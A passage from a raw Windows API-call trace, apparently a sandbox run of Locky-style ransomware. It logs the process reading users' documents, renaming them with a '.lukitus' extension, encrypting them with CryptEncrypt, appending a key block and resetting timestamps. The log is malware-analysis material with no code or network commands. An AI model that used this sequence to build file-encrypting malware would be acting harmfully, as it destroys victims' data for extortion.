ftLastAccessTime.dwHighDateTime=0x1d2f963, ftLastWriteTime.dwLowDateTime=0xbaf73f50, ftLastWriteTime.dwHighDateTime=0x1d2f963, nFileSizeHigh=0x0, nFileSizeLow=0xd9fc)) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.253] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\jrZUr62deGwb.docx" (normalized: "c:\\users\\aetadzjz\\documents\\jrzur62degwb.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.253] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\jrZUr62deGwb.docx" (normalized: "c:\\users\\aetadzjz\\documents\\jrzur62degwb.docx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-71AD6E57-D734BC0DC073.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-71ad6e57-d734bc0dc073.lukitus"), dwFlags=0x9) returned 1 [0107.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.255] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.261] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xd9fc, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xd9fc, lpOverlapped=0x0) returned 1 [0107.261] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.261] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xd9fc, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xd9fc, lpOverlapped=0x0) returned 1 [0107.262] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.262] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63f61fd0, dwHighDateTime=0x1d31760)) [0107.262] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.262] FlushFileBuffers (hFile=0x324) returned 1 [0107.265] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\m5XXH25oGduC2.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\m5xxh25ogduc2.rtf"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7f1d4a0, ftCreationTime.dwHighDateTime=0x1d2fec6, ftLastAccessTime.dwLowDateTime=0xa5cdeb80, ftLastAccessTime.dwHighDateTime=0x1d2f7db, ftLastWriteTime.dwLowDateTime=0xa5cdeb80, ftLastWriteTime.dwHighDateTime=0x1d2f7db, nFileSizeHigh=0x0, nFileSizeLow=0xec92)) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.265] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.266] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.266] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.266] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.266] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.266] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.266] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.266] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\m5XXH25oGduC2.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\m5xxh25ogduc2.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.266] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\m5XXH25oGduC2.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\m5xxh25ogduc2.rtf"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-7B4E72C9-EC40CC1387F6.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-7b4e72c9-ec40cc1387f6.lukitus"), dwFlags=0x9) returned 1 [0107.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.268] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.273] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xec92, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xec92, lpOverlapped=0x0) returned 1 [0107.274] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.274] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xec92, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xec92, lpOverlapped=0x0) returned 1 [0107.275] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.275] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63f61fd0, dwHighDateTime=0x1d31760)) [0107.275] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.275] FlushFileBuffers (hFile=0x324) returned 1 [0107.280] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\1G6BTt0rvWc.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\1g6btt0rvwc.rtf"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41929b30, ftCreationTime.dwHighDateTime=0x1d2fd25, ftLastAccessTime.dwLowDateTime=0xc5d36020, ftLastAccessTime.dwHighDateTime=0x1d30516, ftLastWriteTime.dwLowDateTime=0xc5d36020, ftLastWriteTime.dwHighDateTime=0x1d30516, nFileSizeHigh=0x0, nFileSizeLow=0xe0eb)) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.280] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\1G6BTt0rvWc.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\1g6btt0rvwc.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.280] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\1G6BTt0rvWc.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\1g6btt0rvwc.rtf"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-B233076A-F3F69BE0DE98.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-b233076a-f3f69be0de98.lukitus"), dwFlags=0x9) returned 1 [0107.282] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.282] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.288] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xe0eb, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xe0eb, lpOverlapped=0x0) returned 1 [0107.289] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.289] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xe0eb, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xe0eb, lpOverlapped=0x0) returned 1 [0107.289] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.289] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63f88130, dwHighDateTime=0x1d31760)) [0107.289] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.289] FlushFileBuffers (hFile=0x324) returned 1 [0107.293] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\CCwA9ID7MwdTmr.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\ccwa9id7mwdtmr.rtf"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa46d4740, ftCreationTime.dwHighDateTime=0x1d2fa92, ftLastAccessTime.dwLowDateTime=0x5dc1a090, ftLastAccessTime.dwHighDateTime=0x1d2f621, ftLastWriteTime.dwLowDateTime=0x5dc1a090, ftLastWriteTime.dwHighDateTime=0x1d2f621, nFileSizeHigh=0x0, nFileSizeLow=0xb53e)) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.293] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\CCwA9ID7MwdTmr.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\ccwa9id7mwdtmr.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.293] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\CCwA9ID7MwdTmr.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\ccwa9id7mwdtmr.rtf"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-B0D08948-4AFDF1D5A73F.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-b0d08948-4afdf1d5a73f.lukitus"), dwFlags=0x9) returned 1 [0107.295] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.295] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.300] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xb53e, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xb53e, lpOverlapped=0x0) returned 1 [0107.301] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.301] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xb53e, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xb53e, lpOverlapped=0x0) returned 1 [0107.302] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.302] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63fae290, dwHighDateTime=0x1d31760)) [0107.302] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.302] FlushFileBuffers (hFile=0x324) returned 1 [0107.305] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\r1_647.docx" (normalized: "c:\\users\\aetadzjz\\desktop\\r1_647.docx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47912f70, ftCreationTime.dwHighDateTime=0x1d2f72a, ftLastAccessTime.dwLowDateTime=0x26ec3130, ftLastAccessTime.dwHighDateTime=0x1d2fd50, ftLastWriteTime.dwLowDateTime=0x26ec3130, ftLastWriteTime.dwHighDateTime=0x1d2fd50, nFileSizeHigh=0x0, nFileSizeLow=0xd7c2)) returned 1 [0107.305] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.305] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.305] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.305] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.305] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.305] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.305] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.305] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.305] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.305] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.305] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.306] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.306] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.306] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.306] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.306] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.306] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.306] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: 